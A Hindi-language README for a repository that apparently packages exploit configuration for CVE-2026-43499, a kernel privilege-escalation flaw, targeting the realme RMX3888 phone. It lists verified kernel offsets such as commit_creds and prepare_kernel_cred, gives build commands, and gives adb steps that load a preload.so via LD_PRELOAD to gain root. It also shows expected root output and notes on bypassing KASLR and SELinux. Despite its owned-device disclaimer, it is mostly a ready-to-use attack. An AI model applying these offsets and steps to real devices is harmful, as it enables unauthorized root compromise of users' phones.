
rmx3888-cve-2026-43499-config v0.2.0
realme RMX3888 (Android 16) के लिए CVE-2026-43499 एक्सप्लॉइट कॉन्फ़िगरेशन - 20 सत्यापित कर्नेल ऑफसेट
realme RMX3888 के लिए CVE-2026-43499 एक्सप्लॉइट कॉन्फ़िगरेशन
डिवाइस जानकारी
- ब्रांड/मॉडल: realme RMX3888
- एंड्रॉइड संस्करण: 16 (SDK 36)
- बिल्ड आईडी: BP2A.250605.015
- कर्नेल: Linux 6.1.141-android14-11-o-gffc54a6d2287
- SoC: Qualcomm SM8650 (Snapdragon 8 Gen 3)
- आर्किटेक्चर: ARM64 (aarch64)
अवलोकन
इस रिपॉज़िटरी में realme RMX3888 डिवाइस को लक्षित करने वाले CVE-2026-43499 (GhostLock) एक्सप्लॉइट के लिए संपूर्ण कॉन्फ़िगरेशन फ़ाइलें शामिल हैं। सभी कर्नेल ऑफ़सेट डिवाइस के boot.img से निकाले गए हैं और सत्यापित किए गए हैं।
विशेषताएँ
✓ 20 सत्यापित कर्नेल ऑफ़सेट vmlinux से निकाले गए
✓ रीयल-टाइम लॉगिंग कर्नेल पैनिक सुरक्षा के लिए O_SYNC + fsync के साथ
✓ डिवाइस-विशिष्ट कॉन्फ़िगरेशन RMX3888 के लिए
✓ एक-क्लिक कंपाइलेशन स्क्रिप्ट NDK ऑटो-डिटेक्शन के साथ
✓ व्यापक दस्तावेज़ीकरण बिल्ड गाइड के साथ
शामिल फ़ाइलें
कॉन्फ़िगरेशन फ़ाइलें
- target.h - डिवाइस-विशिष्ट कर्नेल ऑफ़सेट (20 सत्यापित ऑफ़सेट)
- common.h - लॉगिंग एकीकरण के साथ बिल्ड कॉन्फ़िगरेशन
- realtime_log.h - रीयल-टाइम लॉगिंग कार्यान्वयन
दस्तावेज़ीकरण
- BUILD_GUIDE.md - पूर्ण कंपाइलेशन गाइड
- report.md - विस्तृत विश्लेषण रिपोर्ट (राउंड 1)
- round2_report.md - कॉन्फ़िगरेशन रिपोर्ट (राउंड 2)
- ROUND2_STATUS.md - निष्पादन स्थिति सारांश
- compile_status.json - मशीन-पठनीय बिल्ड स्थिति
स्क्रिप्ट्स
- compile_rmx3888.sh - एक-क्लिक कंपाइलेशन स्क्रिप्ट
त्वरित आरंभ
पूर्वापेक्षाएँ
- Android NDK r26d या उससे नया
- Git Bash, Linux/WSL, या Termux वातावरण
कंपाइलेशन
git clone https://github.com/Bailan766/rmx3888-cve-2026-43499-config.git
cd rmx3888-cve-2026-43499-config
export ANDROID_NDK_HOME=/path/to/android-ndk
chmod +x compile_rmx3888.sh
./compile_rmx3888.sh
Windows Git Bash पर, स्क्रिप्ट Android Studio और कमांड-लाइन टूल्स द्वारा उपयोग किए जाने वाले डिफ़ॉल्ट SDK पथ का स्वतः पता लगाती है: /c/Android/Sdk/ndk/*।
नोट: ASHMEM_MISC_FOPS, ASHMEM_COMPAT_IOCTL, और COPY_SPLICE_READ वर्तमान में RMX3888 टार्गेट हेडर में बिल्ड-संगत फ़ॉलबैक का उपयोग करते हैं। रनटाइम व्यवहार पर भरोसा करने से पहले उन्हें सत्यापित RMX3888 vmlinux ऑफ़सेट से बदलें।
उपयोग
# Push to device
adb push build/rmx3888-BP2A.250605.015/bin/preload.so /data/local/tmp/
# Set permissions
adb shell chmod 755 /data/local/tmp/preload.so
# Execute exploit
adb shell LD_PRELOAD=/data/local/tmp/preload.so id
# Check logs
adb shell cat /sdcard/Download/log_*.txt
मुख्य ऑफ़सेट
नीचे दिए गए मुख्य ऑफ़सेट कर्नेल 6.1.141 से निकाले गए थे। बिल्ड-संगत फ़ॉलबैक प्रविष्टियों के लिए ऊपर दिया गया नोट देखें, जिन्हें अभी भी RMX3888-विशिष्ट सत्यापन की आवश्यकता है।
#define KIMAGE_TEXT_BASE 0xffffffc008000000ULL
#define INIT_TASK_OFF 0x0202fc00ULL
#define SECURITY_HOOK_HEADS_OFF 0x015c1488ULL
#define ASHMEM_FOPS_OFF 0x0126bbe0ULL
#define COMMIT_CREDS 0xffffffc0081e9b60 (offset: 0x001e9b60)
#define PREPARE_KERNEL_CRED 0xffffffc0081e9df0 (offset: 0x001e9df0)
// ... 15 more verified offsets
लॉगिंग विशेषताएँ
एकीकृत रीयल-टाइम लॉगिंग मॉड्यूल प्रदान करता है:
- प्राथमिक लॉग पथ: /sdcard/Download/log_.txt
- फ़ॉलबैक पथ: /data/local/tmp/log_.txt
- कर्नेल पैनिक सुरक्षित: तत्काल डिस्क लेखन के लिए O_SYNC + fsync() का उपयोग करता है
- टाइमस्टैम्प वाली प्रविष्टियाँ: सभी लॉग प्रविष्टियों में सटीक टाइमस्टैम्प शामिल होते हैं
- stderr मिरर: लॉग adb logcat के लिए stderr पर भी आउटपुट होते हैं
अपेक्षित परिणाम
सफल एक्सप्लॉइटेशन
uid=0(root) gid=0(root) groups=0(root),1004(input),1007(log),...
लॉग फ़ाइल आउटपुट
` === CVE-2026-43499 Exploit Log Started === Time: 2026-07-23 18:00:00 PID: 12345 UID: 2000 Log Path: /sdcard/Download/log_20260723_180000.txt
[18:00:01] [] Starting exploit... [18:00:02] [+] Kernel base leaked: 0xffffffc008000000 [18:00:03] [] Preparing heap spray... ... `
समस्या निवारण
विस्तृत समस्या निवारण निर्देशों के लिए BUILD_GUIDE.md देखें, जिनमें शामिल हैं:
- कंपाइलेशन त्रुटियाँ
- रनटाइम क्रैश
- KASLR बायपास समस्याएँ
- SELinux पॉलिसी ब्लॉक
सुरक्षा सूचना
⚠️ चेतावनी: यह कॉन्फ़िगरेशन केवल अधिकृत सुरक्षा अनुसंधान के लिए है।
- केवल अपने स्वामित्व वाले डिवाइस पर उपयोग करें
- बिना प्राधिकरण के संकलित बाइनरी वितरित न करें
- जिम्मेदार डिस्क्लोज़र प्रथाओं का सम्मान करें
- लॉग फ़ाइलों में संवेदनशील सिस्टम जानकारी हो सकती है
तकनीकी विवरण
निष्कर्षण प्रक्रिया
- Boot.img को Android Boot Image v4 पार्सर का उपयोग करके अनपैक किया गया
- vmlinux-to-elf का उपयोग करके vmlinux निकाला गया (102,871 सिंबल)
- 99,580 मान्य सिंबल पार्स और विश्लेषित किए गए
- 20 महत्वपूर्ण ऑफ़सेट क्रॉस-सत्यापित किए गए
- सिंबल एड्रेस संगति जाँच के माध्यम से ऑफ़सेट सत्यापन
ऑफ़सेट सत्यापन
- कर्नेल बेस एड्रेस की पुष्टि हुई: 0xffffffc008000000
- सभी सिंबल एड्रेस मेमोरी लेआउट के विरुद्ध सत्यापित किए गए
- संदर्भ डिवाइस (Google Pixel tokay) के साथ क्रॉस-रेफरेंस किया गया
- 100% निष्कर्षण सफलता दर (20/20 ऑफ़सेट)
संदर्भ
- CVE-2026-43499: GhostLock - Ion एलोकेटर UAF भेद्यता
- एक्सप्लॉइट स्रोत: https://github.com/NebuSec/CyberMeowfia
- लक्षित डिवाइस: realme RMX3888 (Snapdragon 8 Gen 3)
लाइसेंस
यह कॉन्फ़िगरेशन केवल शैक्षिक और सुरक्षा अनुसंधान उद्देश्यों के लिए प्रदान किया गया है।
अस्वीकरण
इस रिपॉज़िटरी में सुरक्षा अनुसंधान सामग्री शामिल है। इस कोड के कारण होने वाले किसी भी दुरुपयोग या क्षति के लिए लेखक और योगदानकर्ता जिम्मेदार नहीं हैं। अपने जोखिम पर उपयोग करें और केवल उन्हीं डिवाइसों पर जिनके आप स्वामी हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट प्राधिकरण है।
निर्मित: 2026-07-23
कर्नेल संस्करण: 6.1.141-android14-11-o-gffc54a6d2287
ऑफ़सेट सत्यापन: 100% (20/20)
स्थिति: कंपाइलेशन के लिए तैयार